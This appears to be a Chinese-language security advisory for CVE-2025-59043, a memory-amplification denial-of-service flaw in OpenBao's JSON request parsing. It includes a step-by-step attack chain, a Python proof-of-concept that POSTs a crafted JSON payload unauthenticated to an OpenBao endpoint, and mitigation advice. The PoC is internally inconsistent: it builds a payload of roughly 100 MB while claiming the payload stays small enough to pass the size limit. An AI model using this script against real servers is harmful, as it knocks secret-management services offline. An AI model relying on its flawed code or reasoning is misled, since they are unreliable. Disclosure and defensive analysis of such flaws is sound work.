CVE-2025-59043 OpenBao JSON反序列化内存放大拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-59043

漏洞类型

拒绝服务（内存耗尽/JSON炸弹）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenBao

漏洞概述

OpenBao是一个开源的基于身份的秘密管理系统（身份型密钥管理工具）。CVE-2025-59043是存在于OpenBao 2.4.1之前版本中的一个高危拒绝服务漏洞。该漏洞源于OpenBao在处理HTTP请求时，对JSON对象进行反序列化操作时存在内存放大问题。经过解码后的JSON对象所占用的内存可能远大于其序列化版本所占用的内存。攻击者可以精心构造一个JSON负载，使序列化内存使用与反序列化内存使用之间的比例最大化，类似于ZIP炸弹的效果，放大倍数可达约35倍。这种内存放大特性使得攻击者可以绕过OpenBao中用于防止拒绝服务攻击的max_request_size配置参数。由于请求体在请求处理链的早期阶段（在身份认证之前）就被解析为map数据结构，这意味着未经身份认证的远程攻击者可以通过发送特制的JSON对象来触发内存耗尽（OOM）崩溃。此外，对于包含大量字符串的请求，审计子系统也会消耗大量的CPU资源，进一步加剧拒绝服务的影响。该漏洞已在OpenBao 2.4.1版本中修复。

技术细节

该漏洞的核心原理在于Go语言中JSON反序列化的内存放大效应。当OpenBao的HTTP服务器接收到客户端请求时，会在请求处理的早期阶段（即身份认证之前）将请求体中的JSON数据解析为map[string]interface{}类型的数据结构。

攻击原理：
1. 攻击者构造一个序列化后体积较小（符合max_request_size限制）的JSON对象；
2. 该JSON对象包含大量重复的键值对或深层嵌套结构；
3. 当Go的encoding/json包将这些数据反序列化为map时，每个键和值都需要额外的内存来存储哈希表条目、指针和接口包装；
4. 序列化与反序列化之间的内存放大因子可达约35倍；
5. 由于max_request_size仅检查序列化后的请求体大小，因此无法有效防止反序列化后的内存膨胀；
6. 大量并发请求可迅速耗尽服务器内存，触发OOM Killer终止进程。

利用方式：
- 攻击者无需任何认证凭据即可发起攻击；
- 通过简单的HTTP POST请求发送精心构造的JSON负载；
- 目标系统会在反序列化阶段消耗大量内存并最终崩溃；
- 对于包含大量字符串的请求，审计日志记录过程也会消耗大量CPU资源。

攻击链分析

STEP 1

步骤1：侦察目标

攻击者识别运行OpenBao 2.4.1之前版本的目标服务器，通过网络扫描或信息收集确认目标暴露了OpenBao的HTTP API端点。

STEP 2

步骤2：构造JSON炸弹

攻击者精心构造一个序列化后体积较小（可绕过max_request_size限制）的JSON负载，其中包含大量键值对或深层嵌套结构，使反序列化后的内存占用达到序列化大小的约35倍。

STEP 3

步骤3：发送未认证请求

攻击者通过HTTP POST请求将特制的JSON负载发送到OpenBao的任意API端点。由于请求体解析发生在身份认证之前，无需提供任何认证凭据。

STEP 4

步骤4：触发内存耗尽

OpenBao服务器在反序列化JSON负载时分配大量内存（远超过max_request_size所限制的序列化大小），导致服务器内存迅速耗尽。

STEP 5

步骤5：拒绝服务

服务器因内存耗尽触发OOM Killer或进程崩溃，OpenBao服务不可用。同时审计子系统处理大量字符串时也会消耗大量CPU资源，加剧服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59043 PoC - OpenBao JSON Memory Amplification DoS
# This PoC demonstrates how to craft a JSON payload that bypasses
# max_request_size but causes significant memory consumption after deserialization.

import json
import requests

TARGET_URL = "https://openbao-target.example.com/v1/sys/mounts"
KEY_COUNT = 100000  # Number of duplicate keys to amplify memory usage

def craft_bomb_payload(key_count):
    """
    Create a JSON payload that is small in serialized form
    but consumes significantly more memory when deserialized into a Go map.
    """
    payload = {}
    # Using a single key with a large string value can also amplify memory
    # due to Go's string interning and map overhead
    large_string = "A" * 1024  # 1KB string per entry
    for i in range(key_count):
        # Each unique key adds overhead for hash computation and map bucket allocation
        payload[f"key_{i}_padding_to_make_it_longer_{'x'*50}"] = large_string
    return payload

def exploit(target_url):
    headers = {"Content-Type": "application/json"}
    payload = craft_bomb_payload(KEY_COUNT)

    # Serialize - this will be checked against max_request_size
    serialized = json.dumps(payload)
    print(f"[*] Serialized payload size: {len(serialized)} bytes")
    print(f"[*] Estimated deserialized memory: ~{len(serialized) * 35} bytes")

    # Send the request - no authentication required
    response = requests.post(target_url, headers=headers, data=serialized)
    print(f"[*] Response status: {response.status_code}")
    print(f"[*] Response body: {response.text[:500]}")

if __name__ == "__main__":
    exploit(TARGET_URL)

影响范围

OpenBao < 2.4.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在前端反向代理（如Nginx）配置严格的请求体大小限制（如1MB），覆盖OpenBao的max_request_size配置；2）使用防火墙限制对OpenBao API端点的访问，仅允许可信IP地址访问；3）配置系统级别的内存限制（如cgroups或systemd的MemoryMax），防止单个进程耗尽所有内存；4）部署WAF规则检测异常的JSON负载模式（如大量重复键或异常嵌套深度）；5）监控OpenBao进程的内存使用情况，设置告警阈值以便及时响应。